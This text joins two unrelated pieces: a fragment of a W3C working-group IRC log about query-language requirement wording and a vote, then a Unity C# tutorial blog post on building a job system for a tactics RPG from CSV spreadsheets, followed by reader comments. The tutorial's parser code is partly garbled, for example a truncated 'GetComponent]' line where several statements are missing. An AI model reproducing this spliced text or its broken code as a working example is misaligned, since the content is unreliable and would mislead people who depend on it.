replacing "If more than one RDF graph is specified, the result is as if the query had been executed against the merge of the specified RDF grpahs."
16:03:53 [dirkx]
dirkx has joined #dawg
16:08:38 [AlbertoR]
dirkx proposed wording
16:09:28 [rob]
It must be possible for queries to ask for data from multiple
16:09:34 [rob]
rdf sources.
16:09:37 [dirkx]
dirkx has joined #dawg
16:09:45 [rob]
It must be possible to query the origin of statements.
16:10:24 [Yoshio]
Dirk? what's the difference between 4.2.1 and 4.2.3?
16:10:49 [DaveB]
a repository can have multiple sources; there can be multiple sources wih multiple repositories
16:11:01 [ericP]
(query Q1 on A) U (query Q1 on B)
16:11:11 [ericP]
query Q1 on (A U B)
16:11:16 [dirkx]
Andy brings up a good point; the Origin Server problem versus the Server problem
16:11:55 [dirkx]
And that is not clear if you do not already have the pre-conveived idea
16:13:24 [DaveB]
AndyS - don't like 4.2.1 distributed query implication
16:14:52 [DaveB]
Kendall would change "to expose the source from which that query server collected " to remove the specificity
16:20:26 [ericP]
s/listed in/expressed in/
16:24:54 [DaveB]
considering a replacement for 4.2&4.5 being composed in email
16:25:58 [DaveB]
vote
16:26:02 [DaveB]
objection RobS
16:26:08 [DaveB]
abstain SteveH
16:26:14 [DaveB]
on email yet to be sent ... hold on
16:26:49 [DaveB]
DECIDED
16:27:00 [Yoshio]
re: inserting "over" +1 to Andy --- representing non-natives :)
16:27:02 [DaveB]
words in
16:27:10 [DaveB]
^- are the decided words
16:27:34 [DaveB]
kendall has editorial action to do wordmunging
16:28:32 [DaveB]
move to adjourn
16:28:36 [DaveB]
ADJOURNED
16:28:38 [DanC_lap]
ADJOUN.
16:28:43 [danbri_dna]
congrats ;)
16:54:40 [AndyS]
AndyS has joined #dawg
16:55:45 [afs]
afs has joined #dawg
16:56:10 [afs_]
afs_ has joined #dawg
|
http://www.w3.org/2004/09/17-dawg-irc
|
CC-MAIN-2018-26
|
refinedweb
| 6,027
| 65.15
|
Want to avoid the missteps to gaining all the benefits of the cloud? Learn more about the different assessment options from our Cloud Advisory team.
#include <stdio.h> #include <stdlib.h> #include <unistd.h> int x; int y; int main(void) { pid_t pid; if( (pid = fork()) < 0) { perror("Fork error"); exit(1); } else if( pid == 0) { if (x == 0) { y = x + 1; } else { y = 5; } printf("child: x = %d y = %d\n", x, y); } else { if (y == 0) { x = y + 1; } else { x = 5; } printf("parent: x = %d y = %d\n", x, y); } exit(0); }
Add your voice to the tech community where 5M+ people just like you are talking about what matters.
If you are experiencing a similar issue, please ask a related question
Join the community of 500,000 technology professionals and ask your questions.
|
https://www.experts-exchange.com/questions/27651270/does-fork-process-share-global-variables.html
|
CC-MAIN-2017-39
|
refinedweb
| 137
| 67.28
|
[up one level]
$ cat categories
$ _
jam.vim is some pretty syntax highlighting I made for bjam aka Boost.Jam aka Boost.Build aka what-the-hell-do-I-call-this-thing? Anyway, it's an alternative to make, a lot more powerful, and a lot simpler to use. I based this off of something from a certain Matt Armstrong that I found on some mailing list.
sys_fstream.hpp (20090309) is a reimplementation of C++'s
<fstream> so that I could get at the file descriptor if I needed it.
So if you want to open a file before calling
fstat(2), but still want to use C++'s I/O, you can.
You can even construct the object using the file descriptor or
FILE* pointer.
Obviously, since standard C++ I/O uses buffers, as does C I/O, it's a bad idea to use the file descriptors or
FILE* pointers for I/O unless you promise to flush buffers before switching to a different I/O system (ostreams only).
One usage example is if the following were running set-uid root, the user wouldn't be able to dump
/etc/shadow by exploiting a race condition:
#include <iostream> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include "sys_fstream.hpp" int main(int argc, char **argv) { if (argc < 2) { std::cerr << "need arg\n"; return 1; } std::extra::sys_ifstream in(argv[1]); if (!in) { std::cerr << "failed to open\n"; return 1; } struct stat st; fstat(in.fd(), &st); uid_t uid = getuid(); if (uid && uid != st.st_uid) { // don't bother checking gids in this example std::cerr << "you don't have permission\n"; in.close(); return 1; } std::cout << "access granted:\n=============\n"; std::string line; while (std::getline(in, line)) std::cout << line << '\n'; return 0; }
fibheap.hpp (20091119) An implementation of the Fibonacci heap as described in Cormen et al., with a superset of STL's
std::priority_queue's operations (the new functions being
pop(pointer) and
decrease(pointer, key)).
The only deficiencies are that the copy constructor does not keep the old heap structure (the complexity is the same, but there is some wasted work), and there is no merge operation.
redblack.hpp (20091110) An implementation of Red-black trees as described in Cormen et al., with an almost identical interface as STL's
std::multimap.
I totally needed this for computational geometry, but couldn't get it working.
All of that has changed today, my friends.
So … I hope it works.
I have (disabled) consistency checks implemented that went quiet a while ago, so it really should be fine.
fluks is my implementation of the LUKS (Linux Unified Key Setup) standard. With LUKS there is a master key, used to encrypt a disk partition, and this master key is encrypted in the LUKS header with a much simpler password. I use this on my desktop system. This is the largest thing I have ever written.
Included in fluks is a C99 implementation of CAST6 or CAST-256, described in RFC 2612. It is licensed with ISC and is therefore the only unencumbered C implementation that I know of. I won't call this optimized, but you'd be hard-pressed to make it much faster, I bet. CAST-256 was not an AES finalist.
There's also a C99 implementation of the Tiger hash, using the OpenSSL-style init(), update(), end() interface. License: ISC. The reference version had no update() procedure. Mine is also heavily annotated. I should note that it hasn't been tested on big-endian systems, but I have faith that it will work. The Tiger hash is designed to run well on 64-bit systems.
It is also the home of an independent Serpent implementation, written in C++ (for the references) and accessible to C (at minimum, link with
libsupc++).
License: ISC.
It is generally efficient as it uses bitslicing (with very short S-box functions), but I haven't benchmarked it.
There is a faster, GPL-encumbered version, but it relies on superscalars and CISC architectures.
Serpent was an AES finalist, edged out by Rijndael because it was harder/slower to implement.
It is more secure, though (as far as anybody really knows), if only because it runs slower.
Let's see, what else? I optimized the reference implementation of the Whirlpool hash, and it's now C99 with zero macros. It no longer allows hashing of partial bytes of data. The alignment issues involved are just too much.
javascrypto is a Javascript implementation of several ciphers (just Serpent), hash functions (Tiger and Whirlpool), HMAC (hashed MAC), PBKDF2 (password-based key derivation function), and CTR encryption. Please don't ignore the fact that you cannot trust unsigned crypto implementations, especially over the internets. Who knows what's changed? I only wrote all this for my email page.
flacsplit Splits a FLAC or WAVE file based off a corresponding CUE sheet, compressing the output to FLAC and tagging it from the CUE sheet values. It does everything in memory, saving a lot in I/O costs, so it's fast.
I wrote a guide on installing Folding at Home in OpenBSD. You might be able to use Newton's method to find an approximation of the steps for another platform.
strftime.js strftime(3) in Javascript. 8.4 kB plain, 3.7 kB minified. I haven't tested the week logic, but it seems good!
ntg9.tar.gz There may have been a way to generate this, but … anyway … I wanted to use the
artikel3 document class in LaTeX, but I wanted the font size to be 9 point.
I basically copied the sizes from the
extarticle's
size9.clo file and … sort of interpolated between ntg's
ntg12.clo,
ntg11.clo, and
ntg10.clo files.
I haven't the foggiest how it works.
smallworld.tar.xz (not a utility).
I got really frustrated by a certain puzzle from Facebook's job puzzles.
The test code for it is really screwy.
I.e. they contrived tests that would not work for implementations using
floats.
Now that's not memory efficient, which is what they wanted.
Well out of protest for this screwy puzzle, I'm posting my code.
I licensed it under MIT.
Successful evaluations get sent to the Facebook people, so they should see my name in it if you submit it legally :).
I now know that it can be solved in O(n lg n) time using an algorithm involving Delaunay triangles.
sudoku.tar.xz (20091123) A sudoku solver I wrote for 9x9 and 16x16 puzzles. It's the only way I'll ever have the patience to solve a 16x16 sudoku. I did it once for real, and that was enough. I pronounce it soo-DOCK-oo.
I run OpenBSD-current, and I hate maintaining it. These make my life loads easier.
clean-tree.c (20090607) is a utility that I place in
/usr/ports to remove all of the w-* directories, used to build packages.
It is obsolete now that ports puts everything in /usr/ports/obj.
This couldn't be written as a shell script since using
find would traverse the w-* directories, even though I don't care what's in there.
So, it was down to Python or C (I didn't yet know Perl).
For the challenge, I chose C.
To build it, just
cd to the directory with it and type
CFLAGS="$CFLAGS -std=c99" make clean-tree.
cvs-update (20080901) is a Python script that updates the CVS repositories.
It also rebuilds
/usr/ports/INDEX, which is a necessary step when using
build-world below.
It should be configured by editing the variables near the top.
build-world-20100128.tar.xz is a program in Perl that builds all packages from a file called 'world'.
Each line of 'world' is a package name, possibly with a partial version (e.g. gkrellm, jdk-1.7).
When you give it a
--update argument, it will rebuild all packages that have updates.
Also with
--update, if the version has increased for a package (not the OpenBSD patch number), anything depending on it will be rebuilt.
In the future, I will add support for setting
FLAVOR in the 'world' file.
Right now, I'm just setting
FLAVOR at the top of the port Makefiles.
Sloppy, I know.
As a side-note, I rewrote this in Python for fun.
It used less lines, but that's probably because there weren't any lines with a lone closing brace like is common in Perl.
Also, every line was longer, so it ended up being bigger.
It executed a second faster in the
--pretend mode (5 vs 6).
It was also much clearer, since Python has a primarily object-oriented API where Perl's is procedural.
Here are two patches I wrote for publicfile, a simple and secure http/ftp server from D. J. Bernstein. Also see the unofficial site for other patches.
publicfile-0.52-sorted.patch sorts the ftp listings before they're sent out.
It uses a binary search tree, because that's what I wanted to write.
20091123 Changed formatting (OpenBSD KNF!), and made the implementation not stupid-complicated, and a little faster, I'm sure.
publicfile-0.52-allowspace.patch allows spaces to appear in filenames.
I cannot think of any reason not to, and it is possibly a bug in DJB's code.
It's doubtful, but the only fix I needed for allowing spaces was the difference between
< and
<=.
Now I usually frown on spaces within filenames, but with my music collection, I make an exception.
Did I just say I have my music files hosted with FTP on my various computers?
No, I clearly did not say that.
bestzip.tar.xz compresses a file with gzip and lzma, and keeps whichever gave better compression.
I ran this in the directory where I keep my Windows software on my fileserver and saved probably 100MB.
Written in C++, boost for the
program_options library and the
scoped_array type, and SUSv3 for
exec (mainly).
Also requires gzip and lzma-utils.
dirsize-20100314.tar.xz recursively sums the sizes and contained sizes of all arguments.
Written in C++ with boost for the
filesystem library, so it's totally cross-platform :).
rescue-20090202.tar.xz is a tool that I developed to recover from a catostrophic loss of data. The lovely Linux developers developed ext4 for years. One day, they announce, 'it's stable!' So I threw caution to the wind and made the switch. Biggest mistake ever. At some point, the root directory was erased (as in, size = 0). Other problems I encountered along the way: the group descriptor table is gone, so I wrote a program to guess, for each group, what block the inodes started at (powers of 3, 5, and 7 are different from the others); I can't seem to find any inodes in the first group; and the ext4 documentation == code.
So, I set out on a quest to recover my data from the evil clutches of ext4, armed with nothing but cygwin, vim, hexedit, python, C, and my wits.
This is the culmination of all my ext4 knowledge.
Although not perfect, it got all 23 GB of my data back at a stellar 1 MB/s (I figure if I had made the I/O asynchronous, it would have been quicker).
Also, the program writes a log that contains the permissions of all files, as well as the symbolic links, since none of this can be done with FAT32 filesystems.
There is a tool called
run_log that will process the log, applying the permissions and recreating the symlinks.
Written in C99 for little-endian systems (I'm not sure how extfs behaves on big-endian systems).
I now use XFS.
multicopy.tar.xz copies a file to multiple destinations. Useful when more than one device is involved. Runs at the speed of the slowest device, and relies on the OS for asynchronous writes.
[up one level]
|
http://pages.cs.wisc.edu/~markus/util/
|
CC-MAIN-2013-20
|
refinedweb
| 2,010
| 66.54
|
projects. IAM roles, and you can choose to create custom roles instead. For more information, see understanding roles and creating and managing custom roles.
End user authentication example
Complete the following sections to obtain credentials for an end user. The following steps use the BigQuery API, but you can replicate this process with any Google Cloud API that has a client library.
Setting BigQuery API.
- Install the BigQuery client libraries.
- If using Python or Node.js, you must install an additional auth library.
PythonInstall the oauthlib integration for Google Auth.
pip install --upgrade google-auth-oauthlib
Creating your client credentials.
Save the credentials file to
client_secrets.json. This file must be distributed with your application.
Authenticating and calling the API
Use the client credentials to perform the OAuth 2.0 flow.
Python
from google_auth_oauthlib import flow # TODO: Uncomment the line below to set the `launch_browser` variable. # launch_browser = True # # The `launch_browser` boolean variable indicates if a local server is used # as the callback URL in the auth flow. A value of `True` is recommended, # but a local server does not work if accessing the application remotely, # such as over SSH or from a remote Jupyter notebook. appflow = flow.InstalledAppFlow.from_client_secrets_file( "client_secrets.json", scopes=[""] ) if launch_browser: appflow.run_local_server() else: appflow.run_console() credentials = appflow.credentials
Use the authenticated credentials to connect to the BigQuery API.
Python
from google.cloud import bigquery # TODO: Uncomment the line below to set the `project` variable. # project = 'user-project-id' # # The `project` variable defines the project to be billed for query # processing. The user must have the bigquery.jobs.create permission on # this project to run a query. See: # client = bigquery.Client(project=project, credentials=credentials) query_string = """SELECT name, SUM(number) as total FROM `bigquery-public-data.usa_names.usa_1910_current` WHERE name = 'William' GROUP BY name; """ query_job = client.query(query_string) # Print the results. for row in query_job.result(): # Wait for the job to complete. print("{}: {}".format(row["name"], row["total"]))
When you run the sample code, the code launches a browser requesting access to the project associated with the client secrets. The resulting credentials can then be used to access the user's BigQuery resources, because the sample requested the BigQuery scope.
In a different use case, you may wish to
|
https://cloud.google.com/docs/authentication/end-user?hl=sv
|
CC-MAIN-2021-21
|
refinedweb
| 372
| 61.33
|
>>."
Re:I have to wonder (Score:5, Funny)
aptitude install sun-java6-source
Re:The new Axis of Evil has formed... (Score:5, Funny)
I wonder who will they make Chairman of this MAO group? Actually Steve has the most experience with chairs, so he should probably be the new Chairman MAO.
Google Buy Oracle (Score:3, Funny)
Re:Um, isn't java code GPL? (Score:3, Funny)
from future import braces
Re:You don't know what the fuck you are talking, being correct, complete, and relevant doesn't matter a bit if your opponent has citations. There is no citation more trust-worthy than an obscure blog. Build a library of biased, inflammatory blogs which tend to back your own positions; this is your only defense.
Now go to it! I'll get you started: "A language specification is like an engine schematic. This is the Free World; we don't just give our engine designs away. Remember Volkswagen got its start when Hitler shared specifications... I mean, are you even being serious, or are you just trolling? As you can see in this blog..."
|
https://developers.slashdot.org/story/10/10/28/1424247/Oracle-Claims-Google-Directly-Copied-Our-Java-Code/funny-comments
|
CC-MAIN-2018-22
|
refinedweb
| 187
| 66.54
|
0
#include <iostream> #include <cstring> using namespace std; class Cow { char name[20]; char * hobby; double weight; public: Cow() { strcpy(name,"peter"); strcpy(hobby,"nothing"); weight = 1.0; } Cow(const char * nm, const char * ho, double wt) { int len = strlen(ho); strncpy(name,nm,19); name[19] = '\0'; hobby = new char[len + 1]; strcpy(hobby,ho); weight = wt; } Cow(const Cow & c) { int len = strlen(c.hobby); strcpy(name,c.name); hobby = new char[len + 1]; strcpy(hobby,c.hobby); weight = c.weight; } ~Cow() { delete [] hobby; } Cow & operator=(const Cow & c) { strcpy(name,c.name); delete [] hobby; hobby = new char[strlen(c.hobby) + 1]; strcpy(hobby,c.hobby); weight = c.weight; } void ShowCow() const { cout << "Name: " << name << endl << "Hobby: " << hobby << endl << "Weight: " << weight << endl; } }; int main() { Cow cow1; cow1.ShowCow(); return 0; }
Program just crashes, spent time on it, but can't seem to find the problem. Does anyone see the problem?
|
https://www.daniweb.com/programming/software-development/threads/351449/not-working
|
CC-MAIN-2017-26
|
refinedweb
| 152
| 61.02
|
In this lesson we will show how to define a variety of jobs and store their data as a project asset. Although we have done this before (with conversation assets), this time we will be creating prefabs programmatically. By choosing prefabs over scriptable objects, we have the ability to take advantage of components such as the features which we introduced in the previous lesson.
Reference
Although I have looked at several games, I’ve been spending the most time looking at Final Fantasy Tactics Advance (FFTA). You can find plenty of FAQ’s and guides online which provide a great way to understand the overall scope of the game. For example, there are around 100 different jobs specified by FFTA – each providing a variation on gameplay:
- Stats (some fixed like movement range, others as growth on level up)
- Items (what categories can be equipped)
- Abilities (what can be actively used while operating as that job, what can be learned and used even outside the job)
- Job Tree (learn enough of one job, and there may be a secondary job which opens up to you)
There is a lot of room for complexity here, but a lot of it is really dependent on your own design. Initially, our job system will be limited to determining the starting stats and growth rates of characters, but it shouldn’t be hard to add Job features to control the categories of equippable items and usable skills in much the same way as we added features to items.
Stats
I still like the idea of being able to change jobs and so I see a great reason to define a lot of different job types. We will begin by creating spreadsheets (.csv) which contain data from which to programmatically create our project assets. Of course it’s up to you to determine how you want to organize your data. Do whatever feels the best to you in order for the data to be easy to view and balance.
Here I have created a simple example with three very generic job-types. I used values somewhere within the ranges you might see from FFTA but made it my own custom list. Ideally you will do the same and flesh out many, many more jobs, rather than cheating by directly copying data from Final Fantasy, tempting though it may be. I am starting with two different spreadsheets. The first I call JobStartingStats.csv which I have placed in the Settings folder.
Name,MHP,MMP,ATK,DEF,MAT,MDF,SPD,MOV,JMP Warrior,43,5,61,89,11,58,100,4,1 Wizard,30,25,11,58,61,89,98,3,2 Rogue,32,13,51,67,51,67,110,5,3
Note that in this case, MOV and JMP are not merely starting stats. They will actually be implemented as StatModifierFeature components so that changing to or from a job will allow the stats to fluctuate up and down.
Next I created a spreadsheet called JobGrowthStats.csv which I also placed in the Settings folder.
Name,MHP,MMP,ATK,DEF,MAT,MDF,SPD Warrior,8.4,0.8,8.8,9.2,1.1,7.6,1.1 Wizard,6.6,2.2,1.1,7.6,8.8,9.2,0.8 Rogue,7.6,1.1,5.6,8.8,5.6,8.8,1.8
Here I have used a floating point number for each modified stat. However, it is a special convention I saw while referencing the FAQ’s. The whole number portion of the number is a fixed amount of growth in that stat with every level-up. The fractional portion of the number is a percent chance that an additional bonus point will be awarded.
For example, using the two spreadsheets above you can deduce that a character which begins the game as a Warrior will start with 43 hit points. Upon gaining a level this character’s maximum hit points will grow by a minimum of 8 but there is a 40% chance it could grow by 9.
Job
Now let’s implement the component which holds the data from our spreadsheets, and which listens to level-ups to actually apply the stat growth, etc. Create a new script called Job in the Scripts/View Model Component/Actor folder.
using UnityEngine; using System.Collections; public class Job : MonoBehaviour { #region Fields / Properties public static readonly StatTypes[] statOrder = new StatTypes[] { StatTypes.MHP, StatTypes.MMP, StatTypes.ATK, StatTypes.DEF, StatTypes.MAT, StatTypes.MDF, StatTypes.SPD }; public int[] baseStats = new int[ statOrder.Length ]; public float[] growStats = new float[ statOrder.Length ]; Stats stats; #endregion #region MonoBehaviour void OnDestroy () { this.RemoveObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL)); } #endregion #region Public public void Employ () { stats = gameObject.GetComponentInParent<Stats>(); this.AddObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL), stats); Feature[] features = GetComponentsInChildren<Feature>(); for (int i = 0; i < features.Length; ++i) features[i].Activate(gameObject); } public void UnEmploy () { Feature[] features = GetComponentsInChildren<Feature>(); for (int i = 0; i < features.Length; ++i) features[i].Deactivate(); this.RemoveObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL), stats); stats = null; } public void LoadDefaultStats () { for (int i = 0; i < statOrder.Length; ++i) { StatTypes type = statOrder[i]; stats.SetValue(type, baseStats[i], false); } stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false); stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false); } #endregion #region Event Handlers protected virtual void OnLvlChangeNotification (object sender, object args) { int oldValue = (int)args; int newValue = stats[StatTypes.LVL]; for (int i = oldValue; i < newValue; ++i) LevelUp(); } #endregion #region Private void LevelUp () { for (int i = 0; i < statOrder.Length; ++i) { StatTypes type = statOrder[i]; int whole = Mathf.FloorToInt(growStats[i]); float fraction = growStats[i] - whole; int value = stats[type]; value += whole; if (UnityEngine.Random.value > (1f - fraction)) value++; stats.SetValue(type, value, false); } stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false); stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false); } #endregion }
First, I declared an array of StatTypes called statOrder – this will serve as a convenience array to help me parse data from the spreadsheets we created earlier. It is static because it wont change from job to job and this way they can all share.
Next I defined two instance arrays, one for holding the starting stat values, and one for holding the grow stat values. I was able to init them with a length equal to the length of the statOrder array from earlier. I might have decided to implement these as a Dictionary, but because Unity doesn’t serialize Dictionaries I decided to keep it as an Array.
There are three public methods. First is Employ which should be called after instantiating a job and attaching it to an actor’s hierarchy. In this method, we get a reference to the actor’s Stats component so that we can listen to targeted level up notifications as well as apply growth to the other stats in response. In addition, this method will allow any job-based feature to become active.
If you want to switch jobs, you should first UnEmploy any currently active Job. This gives the script a chance to deactivate its features and unregister from level up notifications etc.
When creating a unit for the first time, call LoadDefaultstats so that its stats will be initiated to playable values.
Job Parser
Now it’s time to create a script which can parse our spreadsheets and create project assets from them. Create a new script named JobParser in the Editor folder.
using UnityEngine; using UnityEditor; using System; using System.IO; using System.Collections; public static class JobParser { [MenuItem("Pre Production/Parse Jobs")] public static void Parse() { CreateDirectories (); ParseStartingStats (); ParseGrowthStats (); AssetDatabase.SaveAssets(); AssetDatabase.Refresh(); } static void CreateDirectories () { if (!AssetDatabase.IsValidFolder("Assets/Resources/Jobs")) AssetDatabase.CreateFolder("Assets/Resources", "Jobs"); } static void ParseStartingStats () { string readPath = string.Format("{0}/Settings/JobStartingStats.csv", Application.dataPath); string[] readText = File.ReadAllLines(readPath); for (int i = 1; i < readText.Length; ++i) PartsStartingStats(readText[i]); } static void PartsStartingStats (string line) { string[] elements = line.Split(','); GameObject obj = GetOrCreate(elements[0]); Job job = obj.GetComponent]); } static void ParseGrowthStats () { string readPath = string.Format("{0}/Settings/JobGrowthStats.csv", Application.dataPath); string[] readText = File.ReadAllLines(readPath); for (int i = 1; i < readText.Length; ++i) ParseGrowthStats(readText[i]); } static void ParseGrowthStats (string line) { string[] elements = line.Split(','); GameObject obj = GetOrCreate(elements[0]); Job job = obj.GetComponent<Job>(); for (int i = 1; i < elements.Length; ++i) job.growStats[i-1] = Convert.ToSingle(elements[i]); } static StatModifierFeature GetFeature (GameObject obj, StatTypes type) { StatModifierFeature[] smf = obj.GetComponents<StatModifierFeature>(); for (int i = 0; i < smf.Length; ++i) { if (smf[i].type == type) return smf[i]; } StatModifierFeature feature = obj.AddComponent<StatModifierFeature>(); feature.type = type; return feature; } static GameObject GetOrCreate (string jobName) { string fullPath = string.Format("Assets/Resources/Jobs/{0}.prefab", jobName); GameObject obj = AssetDatabase.LoadAssetAtPath<GameObject>(fullPath); if (obj == null) obj = Create(fullPath); return obj; } static GameObject Create (string fullPath) { GameObject instance = new GameObject ("temp"); instance.AddComponent<Job>(); GameObject prefab = PrefabUtility.CreatePrefab( fullPath, instance ); GameObject.DestroyImmediate(instance); return prefab; } }
Because this is a pre-production script, I didn’t put a lot of effort into it. There are hard coded strings, repeated bits of code, etc that could all be cleaned up, but this is not at all re-usable, and doesn’t need to be performant, so I felt no need to waste time on it. As long as it works, I am happy.
In order to make this script work its magic, we added a MenuItem tag. As the name implies, this adds a new entry into Unity’s menu bar. You should see a new entry called “Pre Production” and under that an option called “Parse Jobs”. Select that and our Job assets will be created in the project.
You can easily delete and recreate these assets at any time. Because of this, you might choose to ignore these assets in your source control repository, not that it hurts to keep them. All you truly need to version is the spreadsheet and parser, not the result of using them together.
It is possible to “listen” for changes to your spreadsheets and have the assets re-created automatically. See my post on Bestiary Management and Scriptable Objects for an example of this.
Init Battle State
Now that movement range and jump height stats are able to be driven by a job, let’s change our SpawnTestUnits code to create one of each of the three sample job types. The code to create and configure our units is getting a bit long, and is an indication that we will probably need some sort of factory class soon.
void SpawnTestUnits () { string[] jobs = new string[]{"Rogue", "Warrior", "Wizard"}; for (int i = 0; i < jobs.Length; ++i) { GameObject instance = Instantiate(owner.heroPrefab) as GameObject; Stats s = instance.AddComponent<Stats>(); s[StatTypes.LVL] = 1; GameObject jobPrefab = Resources.Load<GameObject>( "Jobs/" + jobs[i] ); GameObject jobInstance = Instantiate(jobPrefab) as GameObject; jobInstance.transform.SetParent(instance.transform); Job job = jobInstance.GetComponent<Job>(); job.Employ(); job.LoadDefaultStats(); Point p = new Point((int)levelData.tiles[i].x, (int)levelData.tiles[i].z); Unit unit = instance.GetComponent<Unit>(); unit.Place(board.GetTile(p)); unit.Match(); instance.AddComponent<WalkMovement>(); units.Add(unit); // Rank rank = instance.AddComponent<Rank>(); // rank.Init (10); } }
Movement
We will also need to convert our Movement component into a wrapper much like the Rank component was. For this, add a field to store a reference to the Stats component, and then turn range and jumpHeight into properties as follows:
public int range { get { return stats[StatTypes.MOV]; }} public int jumpHeight { get { return stats[StatTypes.JMP]; }} protected Stats stats;
Have the component get its reference to the Stats component in the Start method:
protected virtual void Start () { stats = GetComponent<Stats>(); }
Demo
Open the main Battle scene and play it. There should be three units as there were before, but we removed the variation on movement types – everyone walks for now. See that the range of the units is different depending on the job they began with.
Switch the inspector to Debug mode so that you can see the private stat data in the Stats component. You should see the values have been set according to the starting stats which we had specified for the job.
Stop the scene and go back to the SpawnTestUnits method of the InitBattleState then uncomment the two lines where we add the Rank component and init the starting level to 10. Play the scene a few times and look at the stats of each hero. You should see slight differences in the stats thanks to the random bonus portion of the Job.
Summary
In this lesson we discussed the various purposes of a Jobs system and looked at references from the Final Fantasy series. Then we began implementing our game via spreadsheets so that it would be easy to see and balance the data. We created an editor script which could then parse our spreadsheets and create prefabs as project assets. Finally, we tied these systems back into the main game so that our demo units have stats (including movement stats) which are driven by their job.
Don’t forget that the project repository is available online here. If you ever have any trouble getting something to compile, or need an asset, feel free to use this resource.
62 thoughts on “Tactics RPG Jobs”
Excellent!!! Othe greate tutorial!!!!
A quick question for you: Why, in the updated Movement class, did you put the line where you connect the stats component in the Start method, instead of the awake method, where you have the other connectors (unit and jumper)?
I tried it with the connector in the Start method, and the stat line was never run, causing an error when range or jumpHeight tried to reference stats- the entire Start method wasn’t run, which is strange to me. Thinking I had mistyped something, I copied the movement class from your repository, and experienced the same error. Putting the connector line in the Awake function fixed the problem.
I figured it out- I had left a blank Start method in WalkMovement that was overriding the Movement.Start method.
I am still curious about the reasoning for placing it in start vs awake, however 🙂 Is it to make sure the Stats are loaded before connecting it?
Good question Jordan, I don’t remember any particular reason why I put it in Start instead of Awake. Perhaps just an oversight. Sometimes there are reasons – like if I was manually adding components instead of including them with the prefab, but in this case both Awake and Start would work fine.
Alright, I got prefab generation based on .asset files to work. Basically each prefab has an ‘item’ component attached, but one of the variables in item is ‘sprite’.
I don’t think there is a way to assign a sprite in the CSV file that generates the .asset, unless I reference the image name/path directly. This seems like bad practice.
Is there a good method for data-driving images onto a prefab?
I don’t think I would reference a whole path in the csv, but referencing the name of a sprite doesn’t seem bad to me. You can also try naming conventions so that the names of prefabs have similarly named assets which can be loaded, though in many cases the simple rules end up with too many exceptions and you might as well do it all.
Do you think it’s best for me to fill the item data at runtime or to do it in editor similar to the .asset file generation?
So for example, I have a bunch of prefabs with an ‘Item’ class attached but that class doesn’t have values assigned for its variables yet. Should I assign the variables at runtime only, or would you do it automagically through Editor scripts?
It depends. If you reuse the same prefab with different item data sets then I would do it at runtime. If you always pair exactly the same prefab with exactly the same data, then I would do it at Editor time.
I’ve been looking for an example resource but I’m having trouble finding one. Do you know of any good resources where the name of a file is referenced in an external data file and then that file is linked to the prefab?
You must put the file in a “Resources” folder and then use “Resources.Load” – you don’t even need to know the path as long as it is in the root of the resources folder.
Okay i love your tutorial so far, but now i get an error saying “ArgumentException: The thing you want to instantiate is null.” and it brings me to the line GameObject jobInstance = Instantiate(jobPrefab) as GameObject; from SpawnUnits, but i don’t understand what could be wrong here :
Glad you are enjoying it. Did you remember to run the “Pre Production/Parse Jobs” menu command? You won’t be able to instantiate a job prefab if you didn’t create it first.
I’m also getting this error, and I ran “Pre Production/Parse Jobs” command before hitting the play button.
I wish I could edit my posts here, but the problem was I had misspelled “Rogue” in the stat.csv as “Rouge”. When that was fixed it could find everything fine.
Hey Men
ive got a confusing error.
Assets/Scripts/Exceptions/ValueChangeException.cs(39,25): error CS1501: No overload for method `Modify’ takes `1′ arguments
and also all my skripts wont loading. (Skript can not be loaded) everywhere
do you know what i could do to solve this mistake ?
could it be: when i have everywehre ( using system; and using System.Collections.Generic;
that this send me the errormessage
Okey i Solved everything. ^^
But is it true that now my heros just walk and not fly or teleport at the moment ?
Yep – but feel free to alter it to your liking
Hi Jon!
I just completed this part, and I couldn’t figure out where I could see the stats growth after uncommenting the lines for Rank in the Demo.
I ended up just doing a debug.log so I could see it. Was I supposed to see those stats somewhere else?
Setting up a simple Debug Log is a perfect way to test for now. The stat growth wouldn’t mean much until you had some other sort of data that persisted outside of a battle, and I only built the battle portion of this project. I felt that the non-battle portions were less complicated, and would also be more varied, so I hoped that my readers would be able to implement it based on their own design.
First of all, I am loving these tutorials. I appreciate how much effort you put into automating processes like putting jobs together. Seems really smart for balancing purposes to quickly change a value in a .csv and then pushing a button in unity to update all the objects.
I am using this idea and putting it towards creating a skill tree type system but I am running into an issue where the created prefab is being cleared (all values set to NULL) when I push play in Unity. Any idea why this may be happening?
Thanks again!
I’m glad you’re enjoying them! Regarding your issue, do you experience a similar problem when using the Job prefabs? Do the skill prefabs hold values before you push play? Do they also regain their values after you exit play mode? If so, it might be that something in your code is clearing the values.
Yeah, the skill prefabs are holding their values before pushing play and after pushing play. Upon exiting play the list that the skills are contained in is set to Null along with all the skills in my resource folder. Upon reparsing the values are restored.
I’m going to make some tweeks to the skill tree and skill classes so that the data is private and see if that works. I’ll let you know how it goes. Thanks.
After playing around with the classes I am still running into the issue where the assest values are set to NULL after exiting play as well as when reopening the project.
I find this strange because I am not encountering this issue with the job assets created from this tutorial.
Here is my set up; I have a Skill class which holds several variables. The variables are private and are set through the parsing command. After the Skill is made it is added to the skill tree class. The skill tree class is simply a private list.
I really wonder what could be causing the values to be set to NULL when exiting play and reopening the project. If you have any idea hit me up. Thanks again for sharing your knowledge!
Perhaps if you could share your project – or at least a simplified version with the Skill class, Skill Tree class, parser and sample data to parse I could recreate what you are seeing and might be able to help you out.
What’s the best way to share? Just copy and paste here? I am perfectly ok sharing it.
You could zip your project and share with a link via something like drive.google.com or if you want to just copy and paste the relevant code, perhaps you could start a new thread on my forum since it is a bit off topic for this post.
I created a post on the forum and added a zip with the scripts in question. Let me know what you think!
I started your tutorial here and I like what I see so far. I noticed that you mentioned a job tree kind of system. I got excited and tried to skip ahead to find it, but it seems that you did not actually get into it.
Any chance you will do that at some point? Or give some direction on how to make it with this one? For example, add another experience stat like a job point stat? Keep job levels like fftactics did?
